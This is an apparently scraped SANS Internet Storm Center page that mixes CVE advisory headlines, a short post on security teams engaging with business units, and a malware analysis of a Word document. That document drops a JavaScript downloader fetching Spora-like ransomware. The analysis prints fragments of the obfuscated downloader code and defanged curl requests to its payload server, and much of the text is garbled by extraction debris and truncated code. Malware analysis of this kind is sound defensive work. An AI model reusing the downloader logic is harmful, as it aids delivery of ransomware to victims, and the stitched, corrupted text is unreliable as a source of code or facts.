Oracle Hospitality OPERA 5 Property Services CVE-2017-3574 Remote Security Vulnerability
Oracle WebCenter Sites CVE-2017-3545 Remote Security Vulnerability
Oracle Hospitality OPERA 5 Property Services CVE-2017-3573 Remote Security Vulnerability
Oracle FLEXCUBE Enterprise Limits and Collateral Management Remote Security Vulnerability

A good friend told me that anengagedinformation security professional is one wholeads with the KNOW instead of the NO. This comment struck me and has resonated wellfor the lastseveral years. It hasencouraged me to better understand thedesires of the business areas in an attempt to avoid theperception of being the no police.

We are eachable to recognizethevalue in sprinklingin the information security concepts early and often into software development projects. This approach saves each of the stakeholders a great deal of time and frustration. Especially when compared tothe very opposite approach that often causes the information security team tolearn at the very last minute of a new high profile project that is about tolaunch without theproper level ofinformation security engagement.

There are certainly projects and initiatives that may very wellstill warrant a no from an information security perspective. Before we go there by default,I respectfully invite us all to KNOW before we NO.I truly believe that each of us can all improve the level of engagement with our respectivebusiness areas by considering this approach. In what areas can you KNOW before youNO next week?

Please leave what works in our comments section below.

Russell Eubanks

ISC Handler


(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
Avast! Antivirus CVE-2017-8307 Arbitrary File Deletion Vulnerability
Linux Kernel CVE-2017-7895 Multiple Security Bypass Vulnerabilities
symetrie CVE-2017-7386 Cross Site Scripting Vulnerability
Zabbix CVE-2017-2824 Command Injection Vulnerability
Oracle Solaris CVE-2017-3498 Local Security Vulnerability
Oracle FLEXCUBE Private Banking CVE-2017-3471 Remote Security Vulnerability
Oracle Fusion Middleware CVE-2017-3602 Remote Security Vulnerability
Oracle FLEXCUBE Direct Banking CVE-2017-3495 Remote Security Vulnerability
eXtplorer CVE-2016-4313 Local Directory Traversal Vulnerability
YARA 'yara_yyparse()' Function Denial of Service Vulnerability
YARA 'yy_get_next_buffer()' Function Denial of Service Vulnerability
YARA CVE-2017-5924 Denial of Service Vulnerability
cURL/libcURL CVE-2016-5419 Remote Security Bypass Vulnerability
dpkg CVE-2017-8283 Directory Traversal Vulnerability
Jenkins CVE-2017-1000354 User Impersonation Vulnerability
[security bulletin] HPESBHF03738 rev.1 - HPE Intelligent Management Center (iMC) PLAT, Remote Code Execution
[SECURITY] [DSA 3838-1] ghostscript security update
Jenkins CVE-2017-1000356 Multiple Cross Site Request Forgery Vulnerabilities
Apple iOS 10.2 & 10.3 - Control Panel Denial of Service Vulnerability
Oracle E-Business Suite CVE-2017-3342 Remote Security Vulnerability
Oracle E-Business Suite CVE-2017-3356 Remote Security Vulnerability
Oracle E-Business Suite CVE-2017-3347 Remote Security Vulnerability
Oracle E-Business Suite CVE-2017-3355 Remote Security Vulnerability
Oracle WebCenter Sites CVE-2017-3543 Remote Security Vulnerability
We got many samples from our readers and wethank them for this. It helps us to find how attackers are improving their techniques to bypass security controls and to fool the victims. Often the provided samples are coming from common waves of spam but, sometimes, they are interesting. I padding:5px 10px"> viper Order-complete.docx info +----------+----------------------------------------------------------------------------------------------------------------------------------+ | Key | Value | +----------+----------------------------------------------------------------------------------------------------------------------------------+ | Name | Order-complete.docx | | Tags | whiteknight | | Path | /home/nonroot/.viper/binaries/2/9/d/c/29dcb52fc33dd94a4e2eb866ad3e86ec60f3414372dbd557308d6c59b7131ae3 | | Size | 17034 | | Type | Microsoft Word 2007+ | | Mime | application/vnd.openxmlformats-officedocument.wordprocessingml.document | | MD5 | 64b342c80a7f9e7ec1c85f1f0059feb3 | | SHA1 | 5e0b0c0ed682139588f61f37eaf789003590b66a | | SHA256 | 29dcb52fc33dd94a4e2eb866ad3e86ec60f3414372dbd557308d6c59b7131ae3 | | SHA512 | ae709954da0b03a85323e180961a393820a4289a52e1ae752f499a58947863df86cbb9f66a6a7fe5478f9b64278f055f10bc6ba1871df28f882f71d756cbae48 | | SSdeep | 384:TyD28Wf7rR+4pMyFvt3nr+Jjgozm3BTmDU:FpzrgeRrqXgMU | | CRC32 | 58486E87 | | Parent | | | Children | 25545563f98f99ee0274c2698eefbfec91e176d2165f755ca7ef455b3d468016, | +----------+----------------------------------------------------------------------------------------------------------------------------------+ viper Order-complete.docx padding:5px 10px"> Sub Auto_Open() Msgbox Welcome to SANS ISC! padding:5px 10px"> viper Order-complete.docx office -s [*] Document Structure - [Content_Types].xml - _rels/.rels - word/_rels/document.xml.rels - word/document.xml - word/media/image1.emf - word/embeddings/oleObject1.bin - word/theme/theme1.xml - word/settings.xml - word/webSettings.xml - docProps/core.xml - word/styles.xml - word/fontTable.xml - docProps/app.xml

The Javascript is located in word/embeddings/oleObject1.bin. Once extracted and stored in %APPDATA%\Local\Temp\Order complete.js, it is executed and download a malicious PE file. Let try {,1), deobfus(----qqq:qLU:qjqtqqq:UtF_qF_,1)+?ff + loop, } var data = c.responseText.indexOf(||| padding:5px 10px"> hxxp://

x being incremented by the loop.

When you try to access manually this URL, you get a different content depending on x padding:5px 10px"> $ curl hxxp:// 7,1,2,1,7,7,4,7,6,9,5,5,2|||1d6a11774069571211747695ffff7121b57476957121774709571217747695712177476957121774769571217747695...(removed) $ curl hxxp:// 7,2,4,0,2,8,4,8,0,1,8,2,3|||1d7a30284101872406848018ffff7240b08480187240284841872402848018724028480187240284801872402848018...(removed) $ curl hxxp:// 9,2,0,7,4,7,6,4,1,1,6,4,2|||3d7a97476711692078764116ffff9207b27641169207476451692074764116920747641169207476411692074764116...(removed)

Note the ||| var daddbdbfeed = ebcebafed } function deobfus(s,key){ var fcddcdfcfcfc = $d.JkT0_gOQ7F:%(*Z,[email protected])pbNhSGsloe5w var buffer = abcafefaddd if (cfbbadafdfabf0) { padding:5px 10px"> var foo = deobfus(----qqq:qLU:qjqtqqq:UtF_qF_ padding:5px 10px"> hxxp://

Data returned by the HTTP request use another obfuscation technique. Data are passed to another function with the key being the array of integers (example as seen above: padding:5px 10px"> viper cab4.exe virustotal -v [+] VirusTotal Report for 5dc3d99293fe7b70a9796cf04492b954: [*] Detecting engines: +-------------------+--------------------------------------------+ | Antivirus | Signature | +-------------------+--------------------------------------------+ | Baidu | Win32.Trojan.WisdomEyes.16070401.9500.9999 | | CrowdStrike | malicious_confidence_100% (D) | | Cyren | W32/Spora.E.gen!Eldorado | | Endgame | malicious (high confidence) | | F-Prot | W32/Spora.E.gen!Eldorado | | Fortinet | W32/GenKryptik.ADNX!tr | | Invincea | | | McAfee | Ransomware-FMFE!5DC3D99293FE | | McAfee-GW-Edition | BehavesLike.Win32.Backdoor.fc | | Qihoo-360 | HEUR/QVM19.1.C414.Malware.Gen | | SentinelOne | static engine - malicious | | Sophos | Mal/Elenoocka-E | | Symantec | ML.Attribute.HighConfidence | +-------------------+--------------------------------------------+ [*] 13 out of 61 antivirus detected 5dc3d99293fe7b70a9796cf04492b954 as malicious. [*]

In this example, we have multiple payloads downloaded with their associated key (no direct PE file), we dont see XOR encryption or Base64 encoding. Nothingsuspicious, just plain text!

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Live Helper Chat - Cross-Site Scripting
[SECURITY] [DSA 3836-1] weechat security update
Internet Storm Center Infocon Status